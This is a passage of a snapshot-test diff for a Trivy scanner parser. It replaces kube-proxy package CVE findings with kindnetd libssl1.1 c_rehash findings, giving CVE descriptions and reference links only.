"description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-5686", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", }, { "type": "URL", - "value": "http://secunia.com/advisories/27215", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "value": "https://security.gentoo.org/glsa/202209-02", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/26048", + "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", }, { "type": "URL", - "value": "http://www.vupen.com/english/advisories/2007/3474", + "value": "https://security.netapp.com/advisory/ntap-20211022-0003/", }, { "type": "URL", - "value": "https://issues.rpath.com/browse/RPL-1825", + "value": "https://ubuntu.com/security/notices/USN-5051-1", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4235", - "installedVersion": "1:4.8.1-1", - "packageName": "passwd", - "references": [ - "https://access.redhat.com/security/cve/CVE-2013-4235", - "https://access.redhat.com/security/cve/cve-2013-4235", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", - "https://github.com/shadow-maint/shadow/issues/317", - "https://github.com/shadow-maint/shadow/pull/545", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", - "https://security-tracker.debian.org/tracker/CVE-2013-4235", - "https://security.gentoo.org/glsa/202210-26", - "https://ubuntu.com/security/notices/USN-5745-1", - "https://ubuntu.com/security/notices/USN-5745-2", - "https://www.cve.org/CVERecord?id=CVE-2013-4235", - ], - }, - "category": "Vulnerability", - "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4235", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3711", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4235", + "value": "https://www.debian.org/security/2021/dsa-4963", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2013-4235", + "value": "https://www.openssl.org/news/secadv/20210824.txt", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/issues/317", + "value": "https://www.tenable.com/security/tns-2021-16", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/545", + "value": "https://www.tenable.com/security/tns-2022-02", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1292", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-1292", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", + "https://linux.oracle.com/cve/CVE-2022-1292.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", + "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220602-0009/", + "https://security.netapp.com/advisory/ntap-20220729-0004/", + "https://ubuntu.com/security/notices/USN-5402-1", + "https://ubuntu.com/security/notices/USN-5402-2", + "https://www.cve.org/CVERecord?id=CVE-2022-1292", + "https://www.debian.org/security/2022/dsa-5139", + "https://www.openssl.org/news/secadv/20220503.txt", + "https://www.oracle.com/security-alerts/cpujul2022.html", + ], + }, + "category": "Vulnerability", + "description": "The c_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2). Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n). Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "c_rehash script allows command injection", + "references": [ { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "value": "https://avd.aquasec.com/nvd/cve-2022-1292", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "value": "https://access.redhat.com/security/cve/CVE-2022-1292", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-26", + "value": "https://bugzilla.redhat.com/2081494", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-1", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-2", + "value": "https://bugzilla.redhat.com/2087913", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "value": "https://bugzilla.redhat.com/2097310", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19882", - "installedVersion": "1:4.8.1-1", - "packageName": "passwd", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19882", - "https://bugs.archlinux.org/task/64836", - "https://bugs.gentoo.org/702252", - "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", - "https://github.com/shadow-maint/shadow/pull/199", - "https://github.com/void-linux/void-packages/pull/17580", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", - "https://security.gentoo.org/glsa/202008-09", - "https://www.cve.org/CVERecord?id=CVE-2019-19882", - ], - }, - "category": "Vulnerability", - "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19882", + "value": "https://bugzilla.redhat.com/2104905", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19882", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", }, { "type": "URL", - "value": "https://bugs.archlinux.org/task/64836", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", }, { "type": "URL", - "value": "https://bugs.gentoo.org/702252", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/199", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf", }, { "type": "URL", - "value": "https://github.com/void-linux/void-packages/pull/17580", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202008-09", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29383", - "installedVersion": "1:4.8.1-1", - "packageName": "passwd", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-29383", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", - "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", - "https://github.com/shadow-maint/shadow/pull/687", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", - "https://www.cve.org/CVERecord?id=CVE-2023-29383", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", - "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", - ], - }, - "category": "Vulnerability", - "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "Improper input validation in shadow-utils package utility chfn", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29383", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29383", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/687", + "value": "https://linux.oracle.com/cve/CVE-2022-1292.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-16156", - "installedVersion": "5.32.1-4+deb11u2", - "packageName": "perl-base", - "references": [ - "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", - "https://access.redhat.com/security/cve/CVE-2020-16156", - "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", - "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", - "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", - "https://ubuntu.com/security/notices/USN-5689-1", - "https://ubuntu.com/security/notices/USN-5689-2", - "https://www.cve.org/CVERecord?id=CVE-2020-16156", - ], - }, - "category": "Vulnerability", - "description": "CPAN 2.28 allows Signature Verification Bypass.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "perl-CPAN: Bypass of verification of signatures in CHECKSUMS files", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-16156", + "value": "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", }, { "type": "URL", - "value": "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-16156", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", }, { "type": "URL", - "value": "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", + "value": "https://security.netapp.com/advisory/ntap-20220602-0009/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", + "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", + "value": "https://ubuntu.com/security/notices/USN-5402-1", }, { "type": "URL", - "value": "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", + "value": "https://ubuntu.com/security/notices/USN-5402-2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1292", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5689-1", + "value": "https://www.debian.org/security/2022/dsa-5139", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5689-2", + "value": "https://www.openssl.org/news/secadv/20220503.txt", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-16156", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31484", - "installedVersion": "5.32.1-4+deb11u2", - "packageName": "perl-base", + "fixedVersion": "1.1.1n-0+deb10u3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2068", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "http://www.openwall.com/lists/oss-security/2023/04/29/1", - "http://www.openwall.com/lists/oss-security/2023/05/03/3", - "http://www.openwall.com/lists/oss-security/2023/05/03/5", - "http://www.openwall.com/lists/oss-security/2023/05/07/2", - "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", - "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", - "https://github.com/andk/cpanpm/pull/175", - "https://metacpan.org/dist/CPAN/changes", - "https://ubuntu.com/security/notices/USN-6112-1", - "https://ubuntu.com/security/notices/USN-6112-2", - "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-2068", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", + "https://linux.oracle.com/cve/CVE-2022-2068.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", + "https://security.netapp.com/advisory/ntap-20220707-0008/", + "https://ubuntu.com/security/notices/USN-5488-1", + "https://ubuntu.com/security/notices/USN-5488-2", + "https://www.cve.org/CVERecord?id=CVE-2022-2068", + "https://www.debian.org/security/2022/dsa-5169", + "https://www.openssl.org/news/secadv/20220621.txt", ], }, "category": "Vulnerability", - "description": "CPAN.pm before 2.35 does not verify TLS certificates when downloading distributions over HTTPS.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "CPAN.pm before 2.35 does not verify TLS certificates when downloading ...", + "name": "the c_rehash script allows command injection", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31484", + "value": "https://avd.aquasec.com/nvd/cve-2022-2068", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "value": "https://access.redhat.com/security/cve/CVE-2022-2068", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "value": "https://bugzilla.redhat.com/2081494", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "value": "https://bugzilla.redhat.com/2087913", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", + "value": "https://bugzilla.redhat.com/2097310", }, { "type": "URL", - "value": "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", + "value": "https://bugzilla.redhat.com/2104905", }, { "type": "URL", - "value": "https://github.com/andk/cpanpm/pull/175", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", }, { "type": "URL", - "value": "https://metacpan.org/dist/CPAN/changes", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6112-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6112-2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-4116", - "installedVersion": "5.32.1-4+deb11u2", - "packageName": "perl-base", - "references": [ - "http://www.openwall.com/lists/oss-security/2011/11/04/2", - "http://www.openwall.com/lists/oss-security/2011/11/04/4", - "https://access.redhat.com/security/cve/CVE-2011-4116", - "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", - "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", - "https://rt.cpan.org/Public/Bug/Display.html?id=69106", - "https://seclists.org/oss-sec/2011/q4/238", - "https://www.cve.org/CVERecord?id=CVE-2011-4116", - ], - }, - "category": "Vulnerability", - "description": "_is_safe in the File::Temp module for Perl does not properly handle symlinks.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "perl: File::Temp insecure temporary file handling", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-4116", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2011/11/04/2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2011/11/04/4", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2011-4116", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", }, { "type": "URL", - "value": "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", }, { "type": "URL", - "value": "https://rt.cpan.org/Public/Bug/Display.html?id=69106", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", }, { "type": "URL", - "value": "https://seclists.org/oss-sec/2011/q4/238", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2011-4116", + "value": "https://linux.oracle.com/cve/CVE-2022-2068.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31486", - "installedVersion": "5.32.1-4+deb11u2", - "packageName": "perl-base", - "references": [ - "http://www.openwall.com/lists/oss-security/2023/04/29/1", - "http://www.openwall.com/lists/oss-security/2023/05/03/3", - "http://www.openwall.com/lists/oss-security/2023/05/03/5", - "http://www.openwall.com/lists/oss-security/2023/05/07/2", - "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", - "https://hackeriet.github.io/cpan-http-tiny-overview/", - "https://www.openwall.com/lists/oss-security/2023/04/18/14", - "https://www.openwall.com/lists/oss-security/2023/05/03/4", - "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", - ], - }, - "category": "Vulnerability", - "description": "HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standa ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31486", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", }, { "type": "URL", - "value": 